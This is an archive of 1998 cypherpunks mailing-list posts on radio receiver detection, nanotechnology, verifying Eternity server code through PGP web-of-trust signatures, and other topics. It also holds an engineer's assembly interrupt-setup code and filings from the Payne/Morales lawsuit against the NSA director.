Content-Type: text/plain



Kay Ping wrote on 1998-01-16 22:02 UTC:
> Radio links are perfect for hiding the location of receivers.

Actually, this is only true for extremely carefully shielded military
receivers and not for normal radios. Every receiver contains a local
oscillator to bring the signal down to intermediate frequency (IF), which
is emitting EM waves itself. In addition, the IF signal is emitted
as well.

As Peter Wright reported in his autobiography, British counterintelligence
(MI5) used vans and planes already in the 1950s to detect spys while
they received radio communication messages from Moscow and to protocol,
which frequency bands the embassies were monitoring (operation RAFTER).
Efficient receiver detection is an active process: You send out short
bursts of a wideband jamming signal and try to find the downtransformed
intermediate frequency equivalent of your burst in the compromising
emanations of the receiver. This way, you get not only the location of
the receiver, but also the precise frequency to which it is tuned.

Locating radio receivers within a radius of many hundred meters this way
was already state of the art in the spook community over 40 years ago,
so you can safely assume that with digital signal processing, the
performance parameters of modern systems have been increased
significantly. Sending out spread-spectrum style pseudo-noise signals
in the active probing bursts could give you in modern receiver detectors
a considerable signal gain.

Markus

-- 
Markus G. Kuhn, Security Group, Computer Lab, Cambridge University, UK
email: mkuhn at acm.org,  home page: <http://www.cl.cam.ac.uk/~mgk25/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@best.com>
Date: Sat, 17 Jan 1998 21:43:03 +0800
To: nobody@replay.com
Subject: Re: Nanotechnology
In-Reply-To: <199801162110.WAA17429@basement.replay.com>
Message-ID: <199801171808.SAA03742@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



Anonymous wrote:

> I think people here seriously underestimate how long nanotech will take.
> Suppose you have a machine which takes atoms and deposits them onto a
> surface, building it up layer by layer.  This is possible with today's
> technology, but it's a slow process.

Quantum Well Lasers are three atomic layers of gallium indium arsenide, 
packed between ultra-thin layers of indium phosphide and used in all high 
speed CDROM drives on the market. 

The revolution is closer than you think!  

Vipul

-- 
Powell lingered. "How's Earth?" 
It was a conventional enough question and Muller gave the 
conventional answer, "Still spinning."
				      -- "Reason", Asimov. 
==================================================================
Vipul Ved Prakash                 | - Electronic Security & Crypto 
mail@vipul.net                    | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Sun, 18 Jan 1998 08:15:05 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: how to release code if the programmer is a target for (fwd)
Message-ID: <tw7d8hqlk5t.fsf@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



<daemon@ATHENA.MIT.EDU> (Jim Choate) writes:

> 
> That's all fine and dandy, however, we *are* talking about an eternity server
> architecture that delivers documents to an end user in a secure manner on
> demand with no mechanism, by design, to determine the original source. In
> this case there would by definition be *no* history to verify against.
> 
> It is in fact this lack of history from the users perspective that causes
> the authenticity problem in the first place. Further, a point that seems
> to have been forgotten, we are talking about signed and not encrypted
> documents. Of course there are some similar problems if we do include the
> encryption of the data itself into the protocol.

Eternity delivers data.  It's up to the user to verify that the data is
what they want, be it PGP signed by the pope, a working cryptosystem, or
whatever.  In this sense, it's no different than random email or whatever
as an untrusted transport medium.

The original question was how to verify the eternity server source code.

I assume the following:
* a potentially corrupted author (give rdl $100 000 and he'll probably
make a minor modification which has no apparent mal effects, give him
$100 000 000 and he'll be a hired gun).  The author is optionally 
anonymous.

* A community of publically-known cypherpunks and code-verifiers,
not all of which are corrupted, but some of which may be.

* A random user who has the public keys of at least (thresh) number of the
cypherpunks, optionally the key of the author of the document/product before
the system becomes questionable, perhaps by looking in the NY Times
for 1 Jan 1999 which has a full page ad taken out by Cypherpunks Anonymous
with the PGP public keys for the 100 leading cypherpunks.

* The piece of code to be verified is bloody long, that is, longer than
any one cypherpunk can afford to verify alone (shooting practice,
installing the minefields and poison gas sprinkler system, etc. take
lots of time)

* The user can tell by visual inspection that a small compilation
system does what they want it to do, and can understand basic logic
enough to tell what signatures imply.

Then:
1) The author releases the code into the network in an optionally 
anonymous way.  There is no reason to trust the code -- even if it
is signed with rdl's eternity dds signing key, no one has any reason
to believe that it isn't an NSA front, since rdl is assumed to be
corrupt, signing anything put in front of him (as long as sufficient
money is put there too)

2) The user wants to run the code, because it's Just That Cool.

3) No one can verify the entire code.  So, Cypherpunks begin signing
small sections of the code with their own previously-established key.
Their keys are established as their reputation is established on
the list, or perhaps by personally meeting these people, in the
traditional PGP web of trust scheme.  There is no central Cypherpunks
Registry, just a decentralized mesh.

4) The user executes the compilation script.  This script looks at the
pgp signatures, sees which ones it can verify from keys it already has
accepted as valid by (3), and, if there are verified good keys from
at least the minimum number of people in every critical section of the
code, it is added to the compile-me-source-tree.  If there are enough
people for every critical section (the user defines all aspects of
this), the source tree is set up for compilation, and compilation can
proceed.  The user knows that every piece of the code in the system
has been verified to their standards -- even if the author of the code
is an evil NSA sleeper agent, it has gotten by independent review by
at least a user-defined-number of people per section.


I fail to see how the specifics of Eternity are relevant -- it's
just basically a PGP web of trust issue.  The transport is irrelevant --
it's untrusted code until it's been verified by people the user
trusts.

Implementing a keyserver in Eternity has the same issues -- you still
need to deal with the PGP web of trust issues.  Signing my secret
alias key with my own key as the only signature and uploading it to
eternity would fail to provide privacy, just as it would if I posted
it anonymously to the mailing list.

One working system is the buildup of "reputation capital" by an identity
using the key.  Again, this is entirely irrelevant to the Eternity
server -- verifying document authenticity is better handled at the
client side.  Eternity should be set up so as long as your ecash is good,
your document is stored -- if I want to store my document under the
name "disney's greatest hits" when it really contains necrophilic
kiddie-porn and microsoft warez, that's my business.

The client software for interacting with Eternity, however, might do
well to have a good document authentication interface.  And perhaps
third-party authentication services could pop up, willing to sign
documents that just meet gross criteria for valid indexing.  You could
then download the key for that service somehow, then use the service
happily.

The abstract issue has been beaten to death on cypherpunks many times.
I just assert that Eternity is no different from "the Net", "the Web",
"remailer networks", "Blacknet", etc. in issues of document verification
and anonymous reputation capital.

-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sun, 18 Jan 1998 08:55:27 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: how to release code if the programmer is a target for (fwd)
Message-ID: <199801180123.TAA16226@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: how to release code if the programmer is a target for (fwd)
> From: Ryan Lackey <rdl@mit.edu>
> Date: 17 Jan 1998 19:07:10 -0500

> Eternity delivers data.  It's up to the user to verify that the data is
> what they want

> The original question was how to verify the eternity server source code.

How are these fundamently different? Assume for a moment that as a user of
an eternity server the source is the data I want.

> I assume the following:

> * a potentially corrupted author (give rdl $100 000 and he'll probably
> make a minor modification which has no apparent mal effects, give him
> $100 000 000 and he'll be a hired gun).  The author is optionally 
> anonymous.

The point I am making is that whether the author is corrupt or not is
irrelevant.

> * A community of publically-known cypherpunks and code-verifiers,
> not all of which are corrupted, but some of which may be.

Ok.

> * A random user who has the public keys of at least (thresh) number of the
> cypherpunks, optionally the key of the author of the document/product before
> the system becomes questionable, perhaps by looking in the NY Times
> for 1 Jan 1999 which has a full page ad taken out by Cypherpunks Anonymous
> with the PGP public keys for the 100 leading cypherpunks.

Pretty expensive and rather unrealistic I suspect. Where does this random
user come from? What is '(thresh)'? What good would an anonymous key
signature provide? You can't verify it within the web of trust model, that
would imply the author wasn't anonymous which takes us back to the 'friends'
attack. How do we know that some number of these cypherpunks aren't turned?
Are you proposing that the user test all 100 of the signatures? Which
realisticaly is the only way to verify any given one of them. Not very many
people will go to that extreme simply for grins and giggles.

> * The piece of code to be verified is bloody long, that is, longer than
> any one cypherpunk can afford to verify alone (shooting practice,
> installing the minefields and poison gas sprinkler system, etc. take
> lots of time)

The standard is programs over ~10k lines is not comprehensible by a single
individual on a line by line basis.

> * The user can tell by visual inspection that a small compilation
> system does what they want it to do, and can understand basic logic
> enough to tell what signatures imply.

'small compilation system' of what? What who wants it to do? The author?
Mallet? The end user?

> Then:
> 1) The author releases the code into the network in an optionally 
> anonymous way.  There is no reason to trust the code -- even if it
> is signed with rdl's eternity dds signing key, no one has any reason
> to believe that it isn't an NSA front, since rdl is assumed to be
> corrupt, signing anything put in front of him (as long as sufficient
> money is put there too)

It isn't the key of the author or the eternity server that is under attack
by Mallet. It is the security of the individual user who is under assault.

> 2) The user wants to run the code, because it's Just That Cool.

We're talking here about users who want to get data that is illegal or
otherwise incriminating or dangerous to one group or another. In particular
let's consider the situation of a Lebanese freedom fighter in Isreal or
perhaps a 'Free Burma' revolutionary in China.

> 3) No one can verify the entire code.  So, Cypherpunks begin signing
> small sections of the code with their own previously-established key.
> Their keys are established as their reputation is established on
> the list, or perhaps by personally meeting these people, in the
> traditional PGP web of trust scheme.  There is no central Cypherpunks
> Registry, just a decentralized mesh.

Which doesn't effect the ability of Mallet to resign that code at the users
end in order to break the users local security.

> 4) The user executes the compilation script.

[material describing script verification deleted]

Mallet can re-write said script, especialy with the sorts of latency that
the Eternity Server forces on the end user, such that it is consistent with
the bogus keys the end-user gets. It is simply much easier to write scripts
in a day than say 10 minutes.

> I fail to see how the specifics of Eternity are relevant -- it's
> just basically a PGP web of trust issue.  The transport is irrelevant --
> it's untrusted code until it's been verified by people the user
> trusts.

The end user may not have people available to trust is the point. The reason
the transport mechanism is relevant is that it is much easier to spoof a
verification script if the user is not going to be surprised with 24 hour
turn around on requests, whereas a responce time measured in minutes lessens
the window of opportunity to Mallet significantly.

It may come as a surprise to you and others but not everyone in the world
can pick up a phone and call a 100 people all over the world and not raise
some suspicion.

> Implementing a keyserver in Eternity has the same issues

While it is perfectly permissible to design Eternity or any data haven with
inherent key servers, I believe it is a bad idea from a design perspective
because it makes the code even larger, decreases the potential for monetary
motives for indipendant key servers to appear, and if the server is
compromised then the key server is also. It is more expensive if Mallet can
be forced to deal with two indipendenat operators then a single monolithic
operator.

[rest deleted]


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 18 Jan 1998 04:29:46 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Nanotechnology
Message-ID: <199801172022.VAA15751@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> 1 coulomb/second = 6.24 x 10^18 atoms/sec.  Assuming an atomic spacing
> of roughly 10^-10 meters, at that rate it'd take you about 18.5 days to
> construct one side of the cube with a thickness of 1mm, or almost four
> months to build another cube.  I'd guesstimate another 4 months to build
> the electronics for it.  And then you'd need some way to assemble the
> pieces.

ok, but how do you build a 10-cm cube inside of a 10-cm cube? :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 18 Jan 1998 05:09:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Nanotechnology
In-Reply-To: <199801162110.WAA17429@basement.replay.com>
Message-ID: <199801172105.WAA21255@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




The Sheriff wrote:

> >I think people here seriously underestimate how long nanotech will take.
> >Suppose you have a machine which takes atoms and deposits them onto a
> >surface, building it up layer by layer.  This is possible with today's
> >technology, but it's a slow process.
> 
> I don't think it's that far away.  Decades (or at least
> years) ago, the US Navy developed a laser so focused and
> controlled it could write messages on one face of a cube
> of salt.

You can also push atoms around with an AFM.  It's just slow.  But even if
it did take a week or two to make something, it would still be practical.
You'd probably have to wait a week to get something delivered by
mail-order, so you might as well make it yourself.

I wonder what Tim 'copyright is dead' May will think when anyone can make
a Pentium clone in their back bedroom. :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "wabe" <wabe@smart.net>
Date: Sun, 18 Jan 1998 15:20:55 +0800
To: "Cypherpunks Distributed Remailer" <cypherpunks@ssz.com>
Subject: uh,
Message-ID: <004601bd23fa$76d1d0a0$a78588d1@justice>
MIME-Version: 1.0
Content-Type: text/plain




    --What is that weird 
lawsuit all about wheresome director of the NSA is getting sued 
forsomething?  Does anyone know?-wabe
 
    
--digsig         
     
EojdyErVslc/s6aQeIHwnOlMw3lUKJhdZc/ZeCNfe7H     
L4ctAUj8gI6C830BTXaeFrhHME7aCeT3ev4HKbeT     
4HICjjQYriAdlICrERT+zrSEtB1bkK+b6iRoC6a0y
 
 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Sun, 18 Jan 1998 12:01:53 +0800
To: cypherpunks@ssz.com
Subject: Kaczynski attempts suicide
Message-ID: <199801180345.EAA18335@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>I don't get it.  The guy is facing the death penalty, and now they're
>trying to keep him alive.

It's typical government arrogance. They can kill but nobody else can. And
they demand that when they consider murdering somebody that the target not
murder himself. Stupidity. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sun, 18 Jan 1998 23:35:29 +0800
To: jy@jya.com
Subject: diplomacy
Message-ID: <34C21266.142B@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

I sure hope the following was diplomatic enough.

NSA exhibited NO SENSE OF HUMOR when I pointed out
'deficiencies' in its crypto algorithm work.  But, too,
the agrieve Islamic fundamentalists may not have too good
senses of humor.

But with that experience, my sensitivities are hightened.

Later, guys.

Back to POSTCARD COMMUNICATIONS!

Sunday 1/18/98 6:24 AM

Jim Allen

Thanks for the call on Friday night.

You said that there might be a problem in the way the interrupts
were turned on.

I told you I would give this some thought.

Here is the routine to turn on the interrupts

;*	Call DasIntOn(IoPointer&, ErrorFlag&, SystemState&, IoData&(0, 0),
;*	IoParm&(0, 0), LgradThres) from Visual Basic.

DasIntOn	PROTO FAR, VBIoPointer:dword, VBErrorFlag:dword,
VBSystemState:dword,
			   VBIoData:dword, VBIoParm:dword, VBLGradThres:dword

DasIntOn	PROC FAR EXPORT, VBIoPointer:dword, VBErrorFlag:dword,
VBSystemState:dword,
				  VBIoData:dword, VBIoParm:dword, VBLGradThres:dword
                Prolog

;* Stage 1	Get addresses of IOPointer, ErrorFlag, SystemState,
;*		IoData, IoParm, LGradThres which point back into VB static array.

		mov eax, VBIoPointer	; get VB IoPointer address
		mov IoPointer, eax	; move it to asm
                mov eax, VBErrorFlag    ; get VB ErrorFlag address
		mov ErrorFlag, eax	; mov it to asm
	        mov eax, VBSystemState  ; get VB SystemState address
		mov SystemState, eax	; move it to asm
                mov eax, VBIoData       ; get VB IoData address
                mov IoData, eax      	; move it to asm
		mov eax, VBIoParm	; get VB IoParm address
		mov IoParm, eax		; move it to asm
		mov eax, VBLGradThres	; get VB LGradThres address
		mov LGradThres, eax	; move it to asm

;* Stage 2	zero the interrupt counter and system state

		mov IntCount, 0
                            mov LocalSysState, 0

;* Stage 3  install dummy interrupt vector

		call SetDummyIntVector	  ; Set dummy IrqLevel interrupt

;* Stage 4  make sure interrupt is masked on the das board

		call DisableDasInt

;* Stage 5  Set up Irq level in bits 4-6 of register 9

		call SetDasIrqLevel

;* Stage 6  set up counter 0 with number of rows AND enable
;* hardware trigger.  This is done in Counter0SetUp.

		call Counter0SetUp

;* Stage 7  Enable interrupt on 8259a

		call EnableIrqMask

;* Stage 8  Set Irq 5 highest prority in 8259a - didn't seem to
;* make any difference in performance

	     ;	call Irg5HighestPriority

;* Stage 9  Burst length set-up

		call EnableDasBurstMode

;* Stage 10  - clear fifo

		call InitDasFifo  ; read and discard 256 fifo words

;* Stage 11  Set application interrupt vector

		call SetDasIntVector	  ; Set IrqLevel interrupt vector

;* Stage 12  Set LocalIop to DataRows - 1.

		MOV ax, DataRows - 1	; set LocalIop = DataRows
		mov LocalIop, ax	;
		les bx, IoPointer	; get address IoPointer%
		mov es:[bx], ax 	; also set VB IoPointer% = 0

;* Stage 13  Set hardware trigger

		call SetHardwareTrigger

;* Stage 14  Clear flip-flop on Pin 25

		call ClearDasPin25

;* Stage 15   Enable interrupt on das board

		call EnableDasInt

		Epilog
		ret 24
DasIntOn        ENDP

This got a bit complicated. 

The ComputerBoard clone of the Keithly-Metrabyte a/d
converter powers-up in an UNKNOWN state.  Or at least
partially UNKNOWN.

One of the random states includes triggering spurious 
interrupt. So a dummy handler had to be inserted to
possibly field bad data.

The attempt was made to interface directly to hardware
without a microcontoller buffer was partially successful.

Sampling at the 1 Khz rate revealed that Windows
occasionally 'did its own thing' as a result of a task
switch and, therfore, interrupts were missed.

To detect when this happened we modified the 
ComputerBoards das 1400 board so that a hardware
count of interrupts received could be compared to
the software count.

Since the a/d values were buffered a FIFO, the FAST
Pentium could catch up.

But this caused the interrupt handler to increase in size
from about 1 K lines, including white space and comments, 
to 2 K lines.
 
Naturally we wish to be in the problem solving, as 
opposed to problem creating, or assignation of blame.

I think we have to consider all possible problem sources.

I am looking at the AC POWER INTERFACE LS SOV
Schematic dated 11-8-96.

I see that the power to the analog and digital cards was
run via a serial port db 25 cable and connector.

Pin assignment are 

   	Pin		Function
   	1		-15 G
	2		+15 GS
	3		+5 G
	4		+15 G
	5		5 GS
	6		tied to pin 7
	7		+15S
     	8		15 S
	9		5
	10		tied to pin 10
	11		+15
	12		tied to pin 11
	13		15 S
	14		tied to pin 1
	15		+5 GS
	16		tied to pin 3
	17		nc
	18		tied to pin 5
	19		+24 ground
	20		tied to pin 19
	21		+5 S
	22		tied to pin 9
	23		tied to pin 22
	24		+24 volts
	25		tied to pin 24

The +24 volts runs to solenoids.

The remaining power runs to both digital and analog Ics.

While some are left wondering why engineers had not
thought of running analog, digital and solenoid power 
down an inexpensive 24 pin PC serial port cable before,
perhaps, we might all guess, other engineers lack 
sufficient innovative audacity.

One engineer opined last summer, when I was working
in the shop on the digital FX, that the PC Data System 
boards may have to be redesigned.

Let's hope that such a major revision is not required.

Naturally, me being a TOTAL CONSERVATIVE [as
evidenced by Morales and my genocide court filing], 
I plan to physically separate the analog and digital
IC s on the digital FX.  

And I am thinking about on-board power regulation to 
keep the 80c32, analog, and digital chips super-happy.
In the field, of course.

I will leave in several hours.  In my grey rabbit.

Air travel safety worries me more now.  

Especially after publication of last book.

Just in case, I will bring my passport.  

The thought of two machines located 180 miles NW
of Edmonton not working well is, of course, 
chilling.

I sure glad the 8051 version of PC Data System is
working fairly well. And is MAKING money for
Metriguard.

See you on Tuesday,  Allah willing.

Later
bill

Title: Payne/Morales v. NSA -- Defendant's Response to Motion for Summary
  Judgment






16 January 1998
Source: William H. Payne

See related files:
http://jya.com/whpfiles.htm

  


  
    
                         
	                   
	        
      U.S. Department of Justice
    
    
      
      United States Attorney
	District of New Mexico
    
    
      __________________________________________________________
    
    
      
      Post Office Box 607
	Albuquerque, New Mexico 87103
	505/766-3341
	505/766-2868
	FAX 505/766-8517
    
    
      
      
    
  


				January 5, 1998


W.H. Payne
P.O. Box 14838
Albuquerque, New Mexico 87191

     Re: Payne & Morales v. Minihan
     USDC NM CIV 97-0266 SC/DJS


Dear Mr. Payne:


     Enclosed is a court-endorsed copy of Defendant's Response to 
Plaintiffs' Motion for Summary Judgment Based on Evidence from 
Admissions.

				Sincerely,

				JOHN J. KELLY
				United States Attorney

				[Signature]

				JAN ELIZABETH MITCHELL
				Assistant U. S. Attorney

JEM/yh
Enclosure
cc/enc: Arthur R. Morales



[Stamp]
FILED
United States District Court
District of New Mexico
98 JAN -5 PM 3:46
Robert M. Marsh
District Clerk



                 IN THE UNITED STATES DISTRICT COURT

                   FOR THE DISTRICT OF NEW MEXICO


WILLIAM H. PAYNE                    )
ARTHUR R. MORALES                   )
                                    )
          Plaintiffs,               )
                                    )
          vs.                       ) CIVIL NO. 97-026 SC/DJS
                                    )
LT GEN KENNETH A. MINIHAN           )
USAF Director, National Security    )
Agency,                             )
                                    )
          Defendant.


 DEFENDANT'S RESPONSE TO PLAINTIFFS' MOTION FOR SUMMARY JUDGMENT
                BASED ON EVIDENCE FROM ADMISSIONS


          Defendant Minihan responds to Plaintiff's Motion for
Summary Judgment Based On Evidence From Admissions1 as follows:

	  1.   Commencing in October, 1997, Plaintiffs served
numerous sets of Requests for Admissions on various employees of
the National Security Agency and on current and past employees of
the Sandia National Laboratory.

	  2.   Counsel for Defendant was not served with copies of
any of said Requests for Admissions until sometime after the
individuals had been served.2

____________________

     1   It should be noted that the instant Motion for Summary
Judgment constitutes Plaintiffs' second motion for summary
judgment. Plaintiffs filed an initial Motion for Summary Judgment
on June 4, 1997 to which Defendant responded on June 19, 1997, and
Plaintiffs filed a Reply on July 1, 1997. Said initial Motion for
Summary Judgment has not been ruled upon. In addition, Defendant
filed a Motion to Dismiss Plaintiff Arthur R. Morales on September
23, 1997, and a Motion seeking dismissal of Plaintiff William
Payne's Freedom of Information Act action on October 3, 1997. All
briefing by all parties has been completed on those Motions.

     2   On October 13, 1997, Plaintiffs mailed a First Set of
Admissions to Kenneth Minihan. However, not until November 3,
1997, did Plaintiffs mail a copy of said First Set of Request for



	  3.   Upon becoming aware that Plaintiffs had served
Requests for Admissions on a number of individuals, on October 23,
1997, Counsel for Defendant filed a Motion and Memorandum To Strike
Any And All Of Plaintiffs' First Set of Requests For Admissions To
Various Employees Of The National Security Agency And To Various
Employees Of Sandia National Laboratory, (hereinafter "Motion and
Memorandum.")

	  4.   As grounds for the Motion and Memorandum, Defendant
argued that Plaintiffs had blatantly disregarded this Court's Order
pertaining to the conduct of discovery and the deadline for
discovery in this Freedom of Information Act action.

	  5.   In Defendant's Motion and Memorandum, Counsel for
Defendant also objected to Plaintiffs' sua sponte decision to
modify the Court's June 11 Order to reflect the delay of the
Court's October 7 Order and the establishment, without leave of
this Court, of new deadlines for discovery, motions practice, and
the filing of the PreTrial Order. (Motion and Memorandum  9, at
4.)

	  6.   In the Motion and Memorandum, Defendant requested
that this Court strike any and all "First Set of Request for
Admission" propounded by Plaintiffs. (Motion and Memorandum, at 5.)

	  7.   Plaintiffs responded to the Motion and Memorandum on
November 5, 1997, specifically seeking that this Court "take no
action in this case until Supreme court takes action on writs on

____________________

Admissions to Counsel for Defendant. Counsel for Defendant was not
provided with copies of any other Requests for Admissions sent to
employees of NSA or employees of the Sandia National Laboratory.

                                2




mandamus, prohibition, and criminal complaint affidavits filed
against judges Svet and Campos and US Attorney Mitchell."
(Plaintiffs' Response to Motion And Memorandum To Strike Any And
All Of Plaintiffs' First Set Of Request For Admissions To Various
Employees Of The National Security Agency And To Various Employees
Of Sandia National Laboratories,  11, at 10.)

	  8.   To date, no order has been issued by this Court on
the matters raised in the Motion and Memorandum, nor has any other
court issued any orders concerning Plaintiffs' cause of action and
various complaints.

	  9.   By their own request, Plaintiffs sought to stay a
ruling on the Defendant's Motion and Memorandum. Absent any ruling
on either the Motion and Memorandum or Plaintiffs' Response,
Defendant Minihan, employees of NSA, and employees of Sandia
National Laboratory, were not obligated to respond to the Requests
for Admissions as provided by Fed.R.Civ.P. 36.3 For Plaintiffs to
now assert in their "Motion for Summary Judgment On Based On
Evidence From Admissions" that because the individuals have not
responded to the Requests for Admissions they are deemed admitted,
flies in the face of their own prayer to this Court to stay a
ruling on the Defendant's Motion to strike the Requests for
Admissions until the Supreme Court takes action.

____________________

     3    Despite the fact that Defendant's employees and other
individuals are not required to respond to the Requests for
Admissions based upon the outstanding pleadings which have yet to
be ruled on by this Court, Plaintiffs characterize that all
admissions are admitted and then publish those admissions on the
Internet.

                                3




	  10.   Defendant requests that this Court either rule upon
Defendant's Motion and Memorandum granting the request to strike
the Requests for Admissions, or grant Plaintiffs' request to stay
this action pending the issuance of the order sought by Plaintiffs
in another forum. Should this Court deny Defendant's Motion and
Memorandum, Defendant respectfully requests that the individuals to
whom Requests for Admissions are appropriate in this action be
given the thirty days to respond to said admissions as provided by
the Federal Rules of Civil Procedure.

	  11.   Plaintiffs requested a stay. Absent a ruling from
this Court denying their request, they cannot proceed to assert
that the Requests for Admissions are deemed admitted. Accordingly,
Plaintiffs' "Motion For Summary Judgment On Based On Evidence From
Admissions" must be denied.


				Respectfully submitted,


				JOHN J. KELLY
				United States Attorney

				[Signature]

				JAN ELIZABETH MITCHELL
				Assistant U.S. Attorney
				P.O. Box 607
				Albuquerque, New Mexico 87103
				(505) 766-3341


I HEREBY CERTIFY that a true copy
of the foregoing pleading was mailed
to PRO SE PLAINTIFFS,
this 5th day of January, 1998.

[Signature]

JAN ELIZABETH MITCHELL
Assistant U. S. Attorney


                                4






		 UNITED STATES DISTRICT COURT
           FOR THE DISTRICT OF NEW MEXICO


William H. Payne        	   	            )
Arthur R. Morales                           )
                                            )
                Plaintiffs,                 )
                                            )
v                                           )	CIV NO 97 0266 
					                 )	SC/DJS
			                            )
Lieutenant General Kenneth A. Minihan, USAF )
Director, National Security Agency	       )
National Security Agency		            )
                                            )
                Defendant                   )


  REPLY TO DEFENDANT'S RESPONSE TO PLAINTIFFS' MOTION FOR 
  SUMMARY JUDGMENT BASED ON EVIDENCE FROM ADMISSIONS

1  COMES NOW plaintiffs Payne [Payne] and Morales [Morales] 

[Plaintiffs], pro se litigants to exercise their rights 

guaranteed under the Constitution, Rules of Civil  Procedure, 

and Local Civil Rules to respond to Defendant's MOTION filed

on 98 JAN-5 within the 14 days allowed by local rule 7.3(b)(4).

2  US Attorney Mitchell [Mitchell]  writes,

  Counsel for Defendant was not served with copies of any of  
  said Requests for Admissions until sometime after the
  individuals had been served.2

Mitchell WAS SERVED

  PLAINTIFFS' FIRST SET OF REQUEST FOR ADMISSION  TO  
  NSA DIRECTOR KENNETH MINIHAN 

  I HEREBY CERTIFY that a copy of the foregoing request for   
  admissions was mailed to Jan Elizabeth Mitchell, Assistant US 
  Attorney, 525 Silver SW, ABQ, NM 87102 this  Monday November 
  3, 1997. 

Michell was not served with any other admissions since

Mitchell is not representing others.

Plaintiffs' served Defendant Minihan properly.  And Minihan

failed to respond to Minihan's admissions within the time

allotted by law.

3 US Attorney Mitchell writes,

  As grounds for the Motion and Memorandum, Defendant
  argued that Plaintiffs had blatantly disregarded this Court's   
  Order pertaining to the conduct of discovery and the deadline 
  for discovery in this Freedom of Information Act action.

Judges Svet and Campos willfully violated Plaintiffs' right

to Discovery.  And thereby earned criminal complaint affidavits

filed with judge Scalia of the Supreme Court.


4 US Attorney Mitchell writes,

  In Defendant's Motion and Memorandum, Counsel for Defendant 
  also objected to Plaintiffs' sua sponte decision to
  modify the Court's June 11 Order to reflect the delay of the
  Court's October 7 Order and the establishment, without leave   
  of this Court, of new deadlines for discovery, motions   
  practice, and the filing of the PreTrial Order. (Motion and   
  Memorandum  9, at 4.)

Judge Svet and Campos attempt to deny Plaintiffs' right to 

Discovery, again, earned Svet and Campos criminal complaint

affidavits.

Plaintiffs exercise their right under the Federal Rules of 

Civil Procedure and the Constitution to conduct Discovery

WITHOUT LEAVE OF COURT!

5 US Attorney Mitchell writes,

   By their own request, Plaintiffs sought to stay a ruling on 
  the Defendant's Motion and Memorandum. Absent any ruling on 
  either the Motion and Memorandum or Plaintiffs' Response,
  Defendant Minihan, employees of NSA, and employees of 
  Sandia National Laboratory, were not obligated to respond to 
  the Requests for Admissions as provided by Fed.R.Civ.P. 36.3 
  For Plaintiffs to now assert in their "Motion for Summary 
  Judgment On Based On Evidence From Admissions" that because   
  the individuals have not responded to the Requests for 
  Admissions they are deemed admitted, flies in the face of   
  their own prayer to this Court to stay a ruling on the 
  Defendant's Motion to strike the Requests for Admissions until 
  the Supreme Court takes action.

Plaintiffs' have REPEATEDLY asked judge Svet and Campos to

disqualify themselves from any rulings on this case because

Campos and Svet do NOT obey the Federal Rules of Civil 

Procedure.

  Replace judges Svet and Campos because these judges
  have demonstrated, IN WRITING, they do not follow the 
  Federal Rules of Civil Procedure.

Plaintiffs' pleas are directed a replacement judge[s].  Not

Svet and Campos.

Therefore, Svet and Campos' failure to remove themselves does 

not stop the legal process. 

Mitchell cites NO law to support her claim that time 

constraints imposed under Fed.R.Civ.P. 36.3 are inapplicable

as a result of Svet's and Campos' failure to remove themselves.

6 US Attorney Mitchell writes,

  Defendant requests that this Court either rule upon
  Defendant's Motion and Memorandum granting the request to   
  strike the Requests for Admissions, or grant Plaintiffs' 
  request to stay this action pending the issuance of the order 
  sought by Plaintiffs in another forum. Should this Court deny 
  Defendant's Motion and Memorandum, Defendant respectfully 
  requests that the individuals to whom Requests for Admissions 
  are appropriate in this action be given the thirty days to 
  respond to said admissions as provided by the Federal Rules of 
  Civil Procedure.

REPLACEMENT JUDGES of the Court should realize the outcome

of the lawsuit has attained international interest as a result

of the

  1  bungled NSA spy sting on Iran 
  2  US government agencies NSA, NIST, and the FBI's
     attempt to control cryptography.

Mitchell's 
  
  DEFENDANT'S RESPONSE TO PLAINTIFFS' MOTION FOR 
  SUMMARY JUDGMENT BASED ON EVIDENCE FROM ADMISSIONS

was posted on Internet at jya.com, click cryptome

  nsasuit8.htm  USA/NSA Responds to Payne/Morales Motion            
                January 16, 1998

Importance of this posting is summed-up in the Toronto Sun, 

Jan. 11, 1998

  US, Iran Need Each Other 
 
  by Eric Margolis 
 
  Iran launched a surprise charm offensive last week, 
  throwing Washington into serious confusion.  

